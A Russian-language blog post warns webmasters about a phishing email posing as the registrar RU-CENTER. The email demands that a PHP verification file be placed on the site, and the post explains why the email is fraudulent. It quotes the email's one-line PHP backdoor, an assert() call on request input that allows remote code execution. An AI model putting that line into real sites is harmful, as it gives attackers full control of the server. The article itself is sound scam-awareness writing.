Развод с блокировкой домена от имени RU-CENTER
Сегодня вебмастеру нужно ухо держать востро. Ибо мошенники изобретают все новые и новые способы как взломать сайты. Эта статья будет полезна обычным блогерам неискушенным во всех тонкостях регистрации и поддержки доменов.
Письмо мошенников о блокировке домена
Получил я недавно такое письмо, написанное якобы от имени популярного регистратора RU-CENTER:
В этом письме мне предлагается подтвердить права владения доменом путем установки PHP кода на мой сайт.
Текст письма может варьироваться в зависимости имени домена, кода который нужно вставить и даты блокировки, но всегда содержит нечто подобное:
Уважаемый администратор домена! В соответствии с поправками, внесенными в правила ICANN, необходимо подтвердить, что управление доменным именем digitalschool34.ru осуществляется лицом, указанным в качестве его администратора. Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл m4h442cy988109p5.php со следующим содержимым: <?php assert(stripslashes($_REQUEST[F01369])); ?> Файл должен быть создан в течение трех рабочих дней с момента получения данного сообщения и находиться на сервере до 2 октября 2018 года, 18:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной. Если процедура подтверждения не будет пройдена, обслуживание доменного имени будет приостановлено.
Почему это письмо от мошенников
Сразу скажу, если вы получили подобное письмо, то смело удаляйте его в корзину. И для этого есть несколько причин:
Причина первая: посмотрите адрес отправителя. Официальный регистратор RU-CENTER отправляет почтовые уведомления только с доменного имени nic.ru. Я же получил письмо от noreply@nic.form:
Конечно в поле From («От кого») можно указать всё, что душе угодно. Оно не является источником информации, содержащим достоверные данные об отправителе. А вот служебные заголовки письма покажут, откуда на самом деле оно пришло.
Вторая причина: бывают домены без сайтов, например почтовые. Поэтому такой способ подтверждения прав владения доменами неправильный в принципе. Ведь владельцу может быть просто негде разместить код подтверждения. Вчитайтесь как это звучит в полученном мною письме: чтобы подтвердить права на домен нужно разместить файл на сайте. Но домен и сайт — это не одно и тоже!
Причина третья: исполняемый код. Ни один серьезный сервис никогда не попросит вас что-то запустить на своем сайте. Максимум вам предложат разместить текстовый файл с набором символов, а он как известно не может нанести вреда вашему сайту.
Анализ вредоносного PHP кода
Если вам интересно чем установка этого PHP кода грозит вашему сайту, то почитайте в сети об особенностях функции assert. И если написать в двух словах, то данный PHP код позволит злоумышленникам выполнить на вашем сайте (сервере) совершенно любой код, создать любые файлы и т.п.
Конечно, чтобы этим кодом можно было воспользоваться нужно соблюсти еще ряд условий. И на «правильно» настроенном сервере такое мало вероятно. Но потенциальная «дыра» есть, не даром в PHP 7.2 эту функциональность assert ограничили.
Развод под видом Роскомнадзора
Будьте бдительны, подобные письма с предложением разместить PHP код на сайте приходят не только от регистраторов доменных имен, но и от имени Роскомнадзора (и возможно других известных организаций). Текст конечно там другой, но суть его одна склонить вас к размещению указанного в письме файла у вас на сайте.
Выводы
Если вы получили подобное письмо, то смело его удаляйте и ничего не бойтесь. Ни в коем случае не нужно размещать предложенный php файл. В случае малейших подозрений — уточняйте информацию в службе поддержки вашего регистратора.
Более того сам регистратор nic.ru присылает письма с уведомлением о том что не в коем случае не запускать ни какие файлы у себя на сервере или хостинге и то что он никогда не просит веб-мастеров запускать или активировать что-то у себя на сервере, предупреждая о мошенниках которые активизировались в последнее время!